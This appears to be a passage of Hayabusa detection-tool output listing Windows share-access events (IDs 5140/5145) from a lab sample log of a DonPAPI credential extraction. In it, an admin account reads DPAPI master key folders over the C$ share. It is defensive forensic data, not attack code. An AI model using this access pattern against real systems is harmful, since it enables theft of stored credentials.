+2021-12-12 16:15:59.732 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.769 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.784 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.800 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.802 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.818 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.833 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.833 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.849 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.865 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\7ac45d37-fa59-41b4-a80a-cb9224e97518 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.865 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\85b74294-ac3a-4166-8db9-0eb9596ae80e | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\cbd1402e-96f2-4c55-a4b3-990c71387659 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.880 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.896 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\e1d47273-0077-4091-9c01-88df1f2b8983 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.896 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.927 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.927 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.958 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.977 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.978 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.997 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:15:59.997 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
